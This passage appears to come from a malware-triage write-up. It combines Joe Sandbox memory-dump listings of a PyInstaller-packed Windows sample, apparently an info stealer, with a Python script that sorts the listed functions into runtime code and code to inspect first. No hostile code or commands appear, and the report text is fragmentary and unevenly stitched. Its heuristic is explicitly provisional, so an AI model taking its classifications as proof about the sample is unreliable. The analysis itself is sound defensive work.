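• Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
Similarity
• API ID: AddrFreeInfogetaddrinfogetnameinfohtonl
• String ID: $(O)$IPv4 sockaddr must be 2 tuple$Oi:getnameinfo$socket.getnameinfo
• Opcode ID: 8c926511a33a684e
• Instruction Fuzzy Hash: AB813B72A08B4686
APIs
  • Part of subcall function 00007FF7EAD09390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7EAD045F4,00000000,00007FF7EAD01985), ref: 00007FF7EAD093C9
• ExpandEnvironmentStringsW.KERNEL32(?,00007FF7EAD086B7,?,?,00000000,00007FF7EAD03CBB), ref: 00007FF7EAD0822C
  • Part of subcall function 00007FF7EAD02810: MessageBoxW.USER32 ref: 00007FF7EAD028EA
Strings
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
Similarity
• API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
• String ID: %.*s$CreateDirectory$LOADER: failed to create runtime-tmpdir path %ls!
• Opcode ID: 34679b23be2e6a85
• Instruction Fuzzy Hash: B2518311A2964245
Memory Dump Source
• Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
Similarity
• API ID: Example
• String ID: placeholder string$no runtime marker here
• Opcode ID: 0000000000000000
• Instruction Fuzzy Hash: 0000000000000000
"""

@dataclass
class FunctionEntry:
    module_base: int = 0
    api_id: str = ""
    opcode_id: str = ""
    strings: list = field(default_factory=list)
    api_calls: list = field(default_factory=list)  # (api, module, ref address, reached via subcall?)

_FIELD = re.compile(r"^•\s*(?P<key>[^:]+?):\s*(?P<value>.*)$")
_SOURCE = re.compile(r"^\S+\.sdmp,\s*Offset:\s*(?P<base>[0-9A-Fa-f]+)")
# "Api.MODULE(args), ref: addr", or "Api.MODULE ref: addr" when the listing omits the arguments
_CALL = re.compile(r"(?P<api>\w+)\.(?P<mod>\w+)(?:\([^)]*\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)")

def parse_entries(text):
    """One FunctionEntry per block; '• Instruction Fuzzy Hash' is the last field of a block."""
    entries, cur = [], FunctionEntry()
    for raw in text.splitlines():
        m = _FIELD.match(raw.strip())
        if not m:
            continue  # section labels ('APIs', 'Similarity', ...) carry no data
        key, value = m.group("key").strip(), m.group("value").strip()
        if key == "Source File" and (s := _SOURCE.match(value)):
            cur.module_base = int(s.group("base"), 16)
        elif key == "API ID":
            cur.api_id = value
        elif key == "String ID":
            # '$' is the listing's separator, so a literal '$' inside a string cannot be recovered
            cur.strings = [s for s in value.split("$") if s]
        elif key == "Opcode ID":
            cur.opcode_id = value
        elif key == "Instruction Fuzzy Hash":
            entries.append(cur)
            cur = FunctionEntry()
        elif c := _CALL.search(raw):
            cur.api_calls.append((c.group("api"), c.group("mod"), int(c.group("ref"), 16),
                                  "Part of subcall" in raw))
    return entries

# Editor-chosen markers (not from the report) for runtime components a PyInstaller-packed
# Python program carries; a module matching them is runtime code, not the stealer's own logic.
RUNTIME_MARKERS = {
    "PyInstaller bootloader": ("LOADER: ", "Failed to extract %s"),
    "CPython _socket": ("socket.getnameinfo", "AF_INET address must be tuple"),
    "CPython _tkinter": ("Tcl_CreateInterp", "Tk_Init"),
}

def classify_modules(entries):
    """Module base address -> sorted names of the runtime components its strings match."""
    by_base = defaultdict(list)
    for e in entries:
        by_base[e.module_base].extend(e.strings)
    return {base: sorted(n for n, marks in RUNTIME_MARKERS.items() if any(mk in s for s in strs for mk in marks))
            for base, strs in by_base.items()}

def functions_to_read(entries):
    """(base, api_id, opcode_id) of functions in modules no marker explains: open these first."""
    tags = classify_modules(entries)
    return [(e.module_base, e.api_id, e.opcode_id) for e in entries if not tags[e.module_base]]

if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    print(classify_modules(parsed), functions_to_read(parsed))
```

On the constructed sample the first two modules are tagged as CPython _socket and PyInstaller bootloader and only the third module's function is left in the "read first" list. Against the full report, paste the whole disassembly section (after stripping the "Download File" widget text) in place of SAMPLE; the classification is only as good as RUNTIME_MARKERS, so extend it with strings from other bundled extension modules as they turn up, and treat a module with no match as the candidate for the grabber's own code rather than as proven malicious.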
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
Memory Dump Source
• Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
Similarity
• API ID: 00007F906026570
• String ID: ..\s\ssl\ssl_ciph.c$ECDHE-ECDSA-AES128-GCM-SHA256$ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384$ECDHE-ECDSA-AES256-GCM-SHA384$SUITEB128$SUITEB128C2$SUITEB128ONLY$SUITEB192$check_suiteb_cipher_list
• API String ID: 1666080152-1099454403
Memory Dump Source
• Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
Similarity
• API ID: 00007E6784
• String ID: ..\s\ssl\tls_srp.c$ssl_srp_ctx_init_intern
• API String ID: 3284476089-1794268454
Memory Dump Source
• Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
Similarity
• API ID:
• String ID: OiII$Unknown Bluetooth protocol$iy#
• API String ID: 0-1931379703
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
Similarity
• API ID: MoveWindow$ObjectSelect$DrawReleaseText
• String ID: P%
• API String ID: 2147705588-2959514604
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
Similarity
• API ID: LongWindow$BlockCreateErrorLastReasonShutdown
• String ID: Needs to remove its temporary files.
• API String ID: 3975851968-2863640275
Memory Dump Source
• Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 190073905-0
                                                                                                                                                                                                                              • Opcode ID: d50f978ffc6665eb39f9add3952e07e3b3ad5350cb73a1dc24da42246009ca06
                                                                                                                                                                                                                              • Instruction ID: 0145e576b2224939fc0cebc366015baae4851e1847118c83344271c10dbd7b4d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d50f978ffc6665eb39f9add3952e07e3b3ad5350cb73a1dc24da42246009ca06
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C81D421E0C6438AFA64BBE5A4813BD66A0AF45BC2F568035D90D477A6DF3CE845C30F
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1495132572.00007FF8E80F1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FF8E80F0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1494989941.00007FF8E80F0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E80FE000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E8111000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E811A000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E811E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495565226.00007FF8E8121000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495640960.00007FF8E8123000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e80f0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 190073905-0
                                                                                                                                                                                                                              • Opcode ID: 1a8d1f532519298a9da786a4129d135a06aa4afe88969801cf82f3079a6a7588
                                                                                                                                                                                                                              • Instruction ID: 73e33365287b8dcfb7dbab4ece3cfc7ace97f0e1942f2d80710a79d2b77c3ae5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a8d1f532519298a9da786a4129d135a06aa4afe88969801cf82f3079a6a7588
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C081CC21E0C6438EFE60ABE594413BD6691AF867C0F55C435EA1D473E6DF3CE845870A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1488870171.00007FF8E7961000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FF8E7960000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488485527.00007FF8E7960000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E79AA000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E79B8000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E7A07000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E7A0C000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E7A0F000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489614277.00007FF8E7A10000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489734191.00007FF8E7A12000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e7960000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 190073905-0
                                                                                                                                                                                                                              • Opcode ID: bfa090c531bac24e46e178867b034455b2b04e74abd31691ae896f8f055f72f8
                                                                                                                                                                                                                              • Instruction ID: fc1ca21bf046af5e42599f36fadebb22c15b1807ca8cdf255dc1ebc5aec1ed3c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bfa090c531bac24e46e178867b034455b2b04e74abd31691ae896f8f055f72f8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1818961E0824386FA64BBE5D44A3BD6691AF867C0F5487B5E93C873D6DE3CE8458302
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1493380127.00007FF8E80D1000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FF8E80D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493237876.00007FF8E80D0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493380127.00007FF8E80DD000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493380127.00007FF8E80E0000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1494657271.00007FF8E80E1000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1494938031.00007FF8E80E3000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e80d0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 190073905-0
                                                                                                                                                                                                                              • Opcode ID: 6519944f3013d940d19d1b81a08512331dda30c88b389df6dfaebd19558cce86
                                                                                                                                                                                                                              • Instruction ID: 0032aa3c8e00bc03ccd2249ab17f4cc8bc8efd210ab0b8d105418ffeb466f37f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6519944f3013d940d19d1b81a08512331dda30c88b389df6dfaebd19558cce86
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B817D21E08A438BFE50ABE5A54137D6690AF857D4F558035EA4D473E6EF3CE8058F0B
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: -$:$f$p$p
                                                                                                                                                                                                                              • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                              • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                              • Instruction ID: de9c408c801e32101772736e53160e0a1d31566744e1e5ec98a3828aaa881f07
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46126562E0C24386FB24FA24D1547B9B7A2FB60750FC441F7D699866CEDB3CE5408B22
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
• String ID: f$f$p$p$f
• API String ID: 3215553584-1325933183
• Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
• Instruction ID: 2653f5c1d6cf5271562f7af52eaaaad06ad4b670c26ad9377011de4cd82377d0
• Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
• Instruction Fuzzy Hash: BC127361E0C54386FB24EA24A054379F7A5FB60754FC4417BF69A46ACCDB7CED808B22

Strings
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2050909247-3659356012
• Opcode ID: fe3ce30ccacf8a50be5b66d9247a717e39d867eba63eb2cc5dedf88405610c38
• Instruction ID: c179b02e8ab817fdc8e10f860ac16882aa3e4fbaf717dbd76427642e37a46e0b
• Opcode Fuzzy Hash: fe3ce30ccacf8a50be5b66d9247a717e39d867eba63eb2cc5dedf88405610c38
• Instruction Fuzzy Hash: FB418E61A0865282FA04FB51A8407B9E396FF54B88FC444B3ED4C4778ADE3CE545C362

APIs
• GetTempPathW.KERNEL32(?,?,00000000,00007FF7EAD03CBB), ref: 00007FF7EAD08704
• GetCurrentProcessId.KERNEL32(?,00000000,00007FF7EAD03CBB), ref: 00007FF7EAD0870A
• CreateDirectoryW.KERNEL32(?,00000000,00007FF7EAD03CBB), ref: 00007FF7EAD0874C
  • Part of subcall function 00007FF7EAD08830: GetEnvironmentVariableW.KERNEL32(00007FF7EAD0388E), ref: 00007FF7EAD08867
  • Part of subcall function 00007FF7EAD08830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7EAD08889
  • Part of subcall function 00007FF7EAD18238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7EAD18251
  • Part of subcall function 00007FF7EAD02810: MessageBoxW.USER32 ref: 00007FF7EAD028EA
Strings
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
• String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
• API String ID: 3563477958-1339014028
• Opcode ID: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
• Instruction ID: 3f3a38a82d29616b10cb8db9ac92c9c84d55e9d54d752fc36843bf9f2c64cb85
• Opcode Fuzzy Hash: e09d7b167afd2147c660aa35db8091a51c6906773476d98e2344c67e24741bda
• Instruction Fuzzy Hash: 43419C61A1964244FA11F721A8A53FEA392EF98788FC001B3ED0D477DEDE7CE401C262

APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
• Associated: 00000002.00000002.1489932395.00007FF8E7A20000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AA3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7ACD000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AD8000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AE3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1493021775.00007FF8E7AE7000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e7a20000_SecuriteInfo.jbxd
Similarity
• API ID: 00007F906026570
• String ID: ..\s\ssl\ssl_ciph.c$SECLEVEL=$STRENGTH$ssl_cipher_process_rulestr
• API String ID: 1666080152-331183818
• Opcode ID: 77200f37a822fc3e73c83f341b3da985b146b72dba8e7c2f48b7546d64b2c977
• Instruction ID: 5d19bea2b8ca4e714c87887bcc9119477ddcf1a335a7bf60d55b50497938d0a7
• Opcode Fuzzy Hash: 77200f37a822fc3e73c83f341b3da985b146b72dba8e7c2f48b7546d64b2c977
• Instruction Fuzzy Hash: FDD1DF72B0C68256FB658F99D48277E66D0FB45BC0F144036EAAE93794DF3CE8418B02

APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
• Instruction ID: 05464cc64c94789c6e6be47188418392d33ad4dfff48b3357dbd55191c3470ef
• Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
• Instruction Fuzzy Hash: 28D19132A087418AFB20EB25D4843ADB7A5FB54B8CF900176DE8D5779ACF38E080C752

APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
• Associated: 00000002.00000002.1489932395.00007FF8E7A20000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AA3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7ACD000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AD8000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1490107533.00007FF8E7AE3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1493021775.00007FF8E7AE7000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e7a20000_SecuriteInfo.jbxd
Similarity
• API ID: 00007A3420ErrorF9060Last
• String ID: %s/%s$..\s\ssl\ssl_cert.c$SSL_add_dir_cert_subjects_to_stack$SSL_add_file_cert_subjects_to_stack$calling OPENSSL_dir_read(%s)
• API String ID: 4113039813-502574948
• Opcode ID: 4c073ab51f1f5d45694974e7a6ca66fe17bac0b484b9deae977fc5280a2839ef
• Instruction ID: 90b0b325f9553e9d5336b03bb081c19c19d51cdfc7d5970b7d6aad9e7d3dfc1d
• Opcode Fuzzy Hash: 4c073ab51f1f5d45694974e7a6ca66fe17bac0b484b9deae977fc5280a2839ef
• Instruction Fuzzy Hash: 8C919F61B1CA8292FA55AFE1F4133BE6251EF85BC4F840035EA6E47B96DF3CE4518702
APIs
• FreeLibrary.KERNEL32(?,?,?,00007FF7EAD1F0AA,?,?,000001DCB39E98F8,00007FF7EAD1AD53,?,?,?,00007FF7EAD1AC4A,?,?,?,00007FF7EAD15F3E), ref: 00007FF7EAD1EE8C
• GetProcAddress.KERNEL32(?,?,?,00007FF7EAD1F0AA,?,?,000001DCB39E98F8,00007FF7EAD1AD53,?,?,?,00007FF7EAD1AC4A,?,?,?,00007FF7EAD15F3E), ref: 00007FF7EAD1EE98
Strings
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
• Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmp
• Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
Similarity
• API ID: Ioctl
• String ID: invalid ioctl command %lu$k(kkk):ioctl$kI:ioctl$kO:ioctl
APIs
• GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7EAD03706,?,00007FF7EAD03804), ref: 00007FF7EAD02C9E
• FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7EAD03706,?,00007FF7EAD03804), ref: 00007FF7EAD02D63
• MessageBoxW.USER32 ref: 00007FF7EAD02D99
Strings
Memory Dump Source
• Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
